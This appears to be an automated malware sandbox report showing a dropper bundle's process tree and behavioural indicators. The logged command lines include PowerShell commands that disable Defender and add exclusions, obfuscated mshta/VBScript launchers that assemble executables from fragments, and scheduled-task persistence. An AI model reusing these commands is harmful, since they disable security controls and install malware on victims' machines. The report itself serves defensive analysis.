Token: SeDebugPrivilege	440	bogAMCgr_ceyHDpTDqaFFCso.exe
Token: SeShutdownPrivilege	3220	Explorer.EXE
Token: SeCreatePagefilePrivilege	3220	Explorer.EXE
Token: SeShutdownPrivilege	3220	Explorer.EXE
Token: SeCreatePagefilePrivilege	3220	Explorer.EXE
Token: SeShutdownPrivilege	3220	Explorer.EXE
Token: SeCreatePagefilePrivilege	3220	Explorer.EXE
Token: SeShutdownPrivilege	3220	Explorer.EXE
Token: SeCreatePagefilePrivilege	3220	Explorer.EXE
Token: SeDebugPrivilege	5740	8274515.exe
Token: SeDebugPrivilege	5792	wlanext.exe
Token: SeShutdownPrivilege	3220	Explorer.EXE
Token: SeCreatePagefilePrivilege	3220	Explorer.EXE
Token: SeDebugPrivilege	5224	taskkill.exe
Token: SeShutdownPrivilege	3220	Explorer.EXE
Token: SeCreatePagefilePrivilege	3220	Explorer.EXE
Token: SeShutdownPrivilege	3220	Explorer.EXE
Token: SeCreatePagefilePrivilege	3220	Explorer.EXE
Token: SeShutdownPrivilege	3220	Explorer.EXE
Token: SeCreatePagefilePrivilege	3220	Explorer.EXE
Token: SeShutdownPrivilege	3220	Explorer.EXE
Token: SeCreatePagefilePrivilege	3220	Explorer.EXE
Token: SeShutdownPrivilege	3220	Explorer.EXE

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3220	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1800 wrote to memory of 1344	1800	4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe	79
PID 1800 wrote to memory of 1344	1800	4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe	79
PID 1800 wrote to memory of 1344	1800	4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe	79
PID 1344 wrote to memory of 1952	1344	setup_installer.exe	80
PID 1344 wrote to memory of 1952	1344	setup_installer.exe	80
PID 1344 wrote to memory of 1952	1344	setup_installer.exe	80
PID 1952 wrote to memory of 4432	1952	setup_install.exe	84
PID 1952 wrote to memory of 4432	1952	setup_install.exe	84
PID 1952 wrote to memory of 4432	1952	setup_install.exe	84
PID 1952 wrote to memory of 2180	1952	setup_install.exe	85
PID 1952 wrote to memory of 2180	1952	setup_install.exe	85
PID 1952 wrote to memory of 2180	1952	setup_install.exe	85
PID 4432 wrote to memory of 2924	4432	cmd.exe	86
PID 4432 wrote to memory of 2924	4432	cmd.exe	86
PID 4432 wrote to memory of 2924	4432	cmd.exe	86
PID 2180 wrote to memory of 2660	2180	cmd.exe	87
PID 2180 wrote to memory of 2660	2180	cmd.exe	87
PID 2180 wrote to memory of 2660	2180	cmd.exe	87
PID 1952 wrote to memory of 2620	1952	setup_install.exe	88
PID 1952 wrote to memory of 2620	1952	setup_install.exe	88
PID 1952 wrote to memory of 2620	1952	setup_install.exe	88
PID 1952 wrote to memory of 4188	1952	setup_install.exe	117
PID 1952 wrote to memory of 4188	1952	setup_install.exe	117
PID 1952 wrote to memory of 4188	1952	setup_install.exe	117
PID 1952 wrote to memory of 4508	1952	setup_install.exe	89
PID 1952 wrote to memory of 4508	1952	setup_install.exe	89
PID 1952 wrote to memory of 4508	1952	setup_install.exe	89
PID 1952 wrote to memory of 3784	1952	setup_install.exe	90
PID 1952 wrote to memory of 3784	1952	setup_install.exe	90
PID 1952 wrote to memory of 3784	1952	setup_install.exe	90
PID 1952 wrote to memory of 4892	1952	setup_install.exe	91
PID 1952 wrote to memory of 4892	1952	setup_install.exe	91
PID 1952 wrote to memory of 4892	1952	setup_install.exe	91
PID 1952 wrote to memory of 3088	1952	setup_install.exe	92
PID 1952 wrote to memory of 3088	1952	setup_install.exe	92
PID 1952 wrote to memory of 3088	1952	setup_install.exe	92
PID 1952 wrote to memory of 3668	1952	setup_install.exe	101
PID 1952 wrote to memory of 3668	1952	setup_install.exe	101
PID 1952 wrote to memory of 3668	1952	setup_install.exe	101
PID 1952 wrote to memory of 3416	1952	setup_install.exe	93
PID 1952 wrote to memory of 3416	1952	setup_install.exe	93
PID 1952 wrote to memory of 3416	1952	setup_install.exe	93
PID 1952 wrote to memory of 3704	1952	setup_install.exe	100
PID 1952 wrote to memory of 3704	1952	setup_install.exe	100
PID 1952 wrote to memory of 3704	1952	setup_install.exe	100
PID 1952 wrote to memory of 4016	1952	setup_install.exe	99
PID 1952 wrote to memory of 4016	1952	setup_install.exe	99
PID 1952 wrote to memory of 4016	1952	setup_install.exe	99
PID 1952 wrote to memory of 3484	1952	setup_install.exe	98
PID 1952 wrote to memory of 3484	1952	setup_install.exe	98
PID 1952 wrote to memory of 3484	1952	setup_install.exe	98
PID 1952 wrote to memory of 5076	1952	setup_install.exe	97
PID 1952 wrote to memory of 5076	1952	setup_install.exe	97
PID 1952 wrote to memory of 5076	1952	setup_install.exe	97
PID 1952 wrote to memory of 2216	1952	setup_install.exe	96
PID 1952 wrote to memory of 2216	1952	setup_install.exe	96
PID 1952 wrote to memory of 2216	1952	setup_install.exe	96
PID 1952 wrote to memory of 1564	1952	setup_install.exe	94
PID 1952 wrote to memory of 1564	1952	setup_install.exe	94
PID 1952 wrote to memory of 1564	1952	setup_install.exe	94
PID 1952 wrote to memory of 3184	1952	setup_install.exe	95
PID 1952 wrote to memory of 3184	1952	setup_install.exe	95
PID 1952 wrote to memory of 3184	1952	setup_install.exe	95
PID 2620 wrote to memory of 5056	2620	cmd.exe	114

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3220
- C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
  "C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1800
- - C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1344
  - - C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\setup_install.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1952
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4432
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2924
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2180
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2660
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Tue19879c4c0e.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2620
      - C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19879c4c0e.exe
        
        Tue19879c4c0e.exe
        6⤵
        Executes dropped EXE
        
        PID:5056
        
        C:\Users\Admin\AppData\Local\Temp\is-9T9QM.tmp\Tue19879c4c0e.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-9T9QM.tmp\Tue19879c4c0e.tmp" /SL5="$20160,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19879c4c0e.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3852
        
        C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19879c4c0e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19879c4c0e.exe" /SILENT
        8⤵
        Executes dropped EXE
        
        PID:5188
        
        C:\Users\Admin\AppData\Local\Temp\is-ATMRQ.tmp\Tue19879c4c0e.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-ATMRQ.tmp\Tue19879c4c0e.tmp" /SL5="$2021E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19879c4c0e.exe" /SILENT
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5404
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Tue195c40958f528163.exe
        5⤵
        
        PID:4508
      - C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue195c40958f528163.exe
        
        Tue195c40958f528163.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4948
        
        C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue195c40958f528163.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue195c40958f528163.exe
        7⤵
        Executes dropped EXE
        
        PID:5580
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Tue19f51bcd77a.exe
        5⤵
        
        PID:3784
      - C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19f51bcd77a.exe
        
        Tue19f51bcd77a.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2520
        
        C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19f51bcd77a.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19f51bcd77a.exe
        7⤵
        Executes dropped EXE
        
        PID:5552
        
        C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19f51bcd77a.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19f51bcd77a.exe
        7⤵
        Executes dropped EXE
        
        PID:5832
        
        C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19f51bcd77a.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19f51bcd77a.exe
        7⤵
        Executes dropped EXE
        
        PID:6116
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Tue19c06f159e0ec.exe
        5⤵
        
        PID:4892
      - C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19c06f159e0ec.exe
        
        Tue19c06f159e0ec.exe
        6⤵
        Executes dropped EXE
        
        PID:4828
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 300
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:2264
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Tue1993b3f72c.exe
        5⤵
        
        PID:3088
      - C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue1993b3f72c.exe
        
        Tue1993b3f72c.exe
        6⤵
        Executes dropped EXE
        
        PID:4452
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Tue19150ee2be694c8a4.exe /mixone
        5⤵
        
        PID:3416
      - C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19150ee2be694c8a4.exe
        
        Tue19150ee2be694c8a4.exe /mixone
        6⤵
        Executes dropped EXE
        
        PID:3104
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 300
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:416
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Tue19b4ef3b53293fe.exe
        5⤵
        
        PID:1564
      - C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19b4ef3b53293fe.exe
        
        Tue19b4ef3b53293fe.exe
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4648
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4648 -s 1960
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:3236
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Tue1969586bcbf58493.exe
        5⤵
        
        PID:3184
      - C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue1969586bcbf58493.exe
        
        Tue1969586bcbf58493.exe
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3812
        
        C:\Users\Admin\Pictures\Adobe Films\hz2zZEE1IO8UL8KkUIl_DiwJ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\hz2zZEE1IO8UL8KkUIl_DiwJ.exe"
        7⤵
        Executes dropped EXE
        
        PID:5684
        
        C:\Users\Admin\Pictures\Adobe Films\lmuaIti549S4IlfLGjOQ62Vi.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\lmuaIti549S4IlfLGjOQ62Vi.exe"
        7⤵
        Executes dropped EXE
        
        PID:5232
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5232 -s 296
        8⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5648
        
        C:\Users\Admin\Pictures\Adobe Films\bogAMCgr_ceyHDpTDqaFFCso.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\bogAMCgr_ceyHDpTDqaFFCso.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        Suspicious use of AdjustPrivilegeToken
        
        PID:440
        
        C:\Users\Admin\Pictures\Adobe Films\dKb7nc_82MUnYJcIwvnENgPK.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\dKb7nc_82MUnYJcIwvnENgPK.exe"
        7⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:5384
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        8⤵
        Creates scheduled task(s)
        
        PID:4508
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        8⤵
        Creates scheduled task(s)
        
        PID:2620
        
        C:\Users\Admin\Pictures\Adobe Films\PzZpKoEf4kqLrhhG_T7hkMOE.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\PzZpKoEf4kqLrhhG_T7hkMOE.exe"
        7⤵
        Executes dropped EXE
        
        PID:904
        
        C:\Users\Admin\Pictures\Adobe Films\OXLD9voH55f6gEm9L6axlvDX.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\OXLD9voH55f6gEm9L6axlvDX.exe"
        7⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4684
        
        C:\Users\Admin\Pictures\Adobe Films\Xhhrp4rIfn8tBtFfUngVP_kE.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Xhhrp4rIfn8tBtFfUngVP_kE.exe"
        7⤵
        Executes dropped EXE
        
        PID:3552
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 272
        8⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6028
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Tue19761b3b8d9d.exe
        5⤵
        
        PID:2216
      - C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19761b3b8d9d.exe
        
        Tue19761b3b8d9d.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3988
        
        C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19761b3b8d9d.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19761b3b8d9d.exe
        7⤵
        Executes dropped EXE
        
        PID:5560
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Tue19c1338f41ab.exe
        5⤵
        
        PID:5076
      - C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19c1338f41ab.exe
        
        Tue19c1338f41ab.exe
        6⤵
        Executes dropped EXE
        
        PID:4896
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 308
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:3448
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Tue19c78ded4d176ac.exe
        5⤵
        
        PID:3484
      - C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19c78ded4d176ac.exe
        
        Tue19c78ded4d176ac.exe
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3332
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Tue19411ac950924ec3f.exe
        5⤵
        
        PID:4016
      - C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19411ac950924ec3f.exe
        
        Tue19411ac950924ec3f.exe
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3304
        
        C:\Users\Admin\AppData\Roaming\8274515.exe
        
        "C:\Users\Admin\AppData\Roaming\8274515.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5740
        
        C:\Users\Admin\AppData\Roaming\4775154.exe
        
        "C:\Users\Admin\AppData\Roaming\4775154.exe"
        7⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2052
        
        C:\Users\Admin\AppData\Roaming\6218320.exe
        
        "C:\Users\Admin\AppData\Roaming\6218320.exe"
        7⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2288
        
        C:\Users\Admin\AppData\Roaming\7042039.exe
        
        "C:\Users\Admin\AppData\Roaming\7042039.exe"
        7⤵
        
        PID:5948
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Roaming\7042039.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Roaming\7042039.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))
        8⤵
        
        PID:3836
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Roaming\7042039.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Roaming\7042039.exe" ) do taskkill -f -Im "%~NXZ"
        9⤵
        
        PID:2644
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -Im "7042039.exe"
        10⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5224
        
        C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe
        
        ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i
        10⤵
        Executes dropped EXE
        
        PID:1540
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF ""-P1jBMdKQQ16j1dp4oT~i "" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))
        11⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "-P1jBMdKQQ16j1dp4oT~i " == "" for %Z iN ( "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ) do taskkill -f -Im "%~NXZ"
        12⤵
        
        PID:4008
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBSCRipT: CLOse ( createoBJECt ( "wScRIpt.shelL" ).RUn ("cMd /C EChO | SEt /p = ""MZ"" > CPkPI.i & CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K & Del /Q * " , 0 ,tRue ) )
        11⤵
        
        PID:1300
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C EChO | SEt /p = "MZ" > CPkPI.i &CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K &Del /Q *
        12⤵
        
        PID:1560
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        13⤵
        
        PID:3240
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>CPkPI.i"
        13⤵
        
        PID:5836
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EChO "
        13⤵
        Blocklisted process makes network request
        
        PID:4648
        
        C:\Windows\SysWOW64\control.exe
        
        control ..\WfNRfms4.K
        13⤵
        Executes dropped EXE
        
        PID:5948
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\WfNRfms4.K
        14⤵
        Loads dropped DLL
        
        PID:6000
        
        C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\WfNRfms4.K
        15⤵
        
        PID:3796
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\WfNRfms4.K
        16⤵
        Loads dropped DLL
        
        PID:3572
        
        C:\Users\Admin\AppData\Roaming\435056.exe
        
        "C:\Users\Admin\AppData\Roaming\435056.exe"
        7⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:5960
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        8⤵
        Executes dropped EXE
        
        PID:4832
        
        C:\Users\Admin\AppData\Roaming\8581712.exe
        
        "C:\Users\Admin\AppData\Roaming\8581712.exe"
        7⤵
        Executes dropped EXE
        
        PID:3504
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Tue192762f1cd058ddf8.exe
        5⤵
        
        PID:3704
      - C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue192762f1cd058ddf8.exe
        
        Tue192762f1cd058ddf8.exe
        6⤵
        Executes dropped EXE
        
        PID:2952
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Tue193858933525b62.exe
        5⤵
        
        PID:3668
      - C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue193858933525b62.exe
        
        Tue193858933525b62.exe
        6⤵
        Executes dropped EXE
        
        PID:3316
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue193858933525b62.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue193858933525b62.exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
        7⤵
        
        PID:1648
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue193858933525b62.exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue193858933525b62.exe") do taskkill -iM "%~nXx" /f
        8⤵
        
        PID:5448
        
        C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe
        
        ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ
        9⤵
        Executes dropped EXE
        
        PID:6012
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
        10⤵
        
        PID:6128
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f
        11⤵
        
        PID:5336
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBscrIpt: cLosE (cREatEObjEcT ( "wscript.sHeLl" ).Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+ y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 ,TruE ) )
        10⤵
        
        PID:5732
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E &Start msiexec -Y .\bENCc.E
        11⤵
        
        PID:5272
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"
        12⤵
        
        PID:5656
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO "
        12⤵
        
        PID:3240
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec -Y .\bENCc.E
        12⤵
        Loads dropped DLL
        
        PID:4700
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -iM "Tue193858933525b62.exe" /f
        9⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6060
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Tue19325eb008c0b950.exe
        5⤵
        
        PID:4188
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1952 -s 644
        5⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious use of AdjustPrivilegeToken
        
        PID:5156
- C:\Windows\SysWOW64\wlanext.exe
  "C:\Windows\SysWOW64\wlanext.exe"
  2⤵
  - Adds policy Run key to start application
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Modifies Internet Explorer settings
  - Suspicious behavior: MapViewOfSection
